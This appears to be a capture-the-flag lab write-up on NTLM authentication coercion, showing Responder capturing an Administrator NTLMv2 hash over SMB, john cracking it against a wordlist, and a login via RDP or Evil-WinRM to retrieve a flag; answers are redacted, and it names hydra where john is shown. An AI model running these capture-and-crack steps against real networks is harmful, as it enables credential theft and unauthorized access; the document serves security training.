Day 23
Coerced Authentication Relay All the Way
Learning Objectives
The basics of network file shares
Understanding NTLM authentication
How NTLM authentication coercion attacks work
How Responder works for authentication coercion attacks
Forcing authentication coercion using
lnk
files
This room is again a very straightforward one with all commands and instructions already given. We just need to follow along and run them.
What is the name of the AD authentication protocol that makes use of tickets?
[REDACTED]
What is the name of the AD authentication protocol that makes use of the NTLM hash?
[REDACTED]
What is the name of the tool that can intercept these authentication challenges?
[REDACTED]
What is the password that McGreedy set for the Administrator account?
[REDACTED]
This can be found once the hash is obtained and with the help of hydra we can get the password.
┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
.
.
.
[+] Current Session Variables:
Responder Machine Name [WIN-55XORMSS5HF]
Responder Domain Name [3ES2.LOCAL]
Responder DCE-RPC Port [46997]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.71.80
[SMB] NTLMv2-SSP Username : ELFHQSERVER\Administrator
[SMB] NTLMv2-SSP Hash : [REDACTED]
[*] Skipping previously captured hash for ELFHQSERVER\Administrator
[*] Skipping previously captured hash for ELFHQSERVER\Administrator
┌──(kali㉿kali)-[~/Desktop/git/ntlm_theft/stealthy]
└─$ john --wordlist=greedykeys.txt hash.txt
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]
What is the value of the flag that is placed on the Administrator’s desktop?
[REDACTED]
We can either RDP into the machine with ther username and password that we found or use Evil-WinRM. The flag can be found on the desktop.
Last updated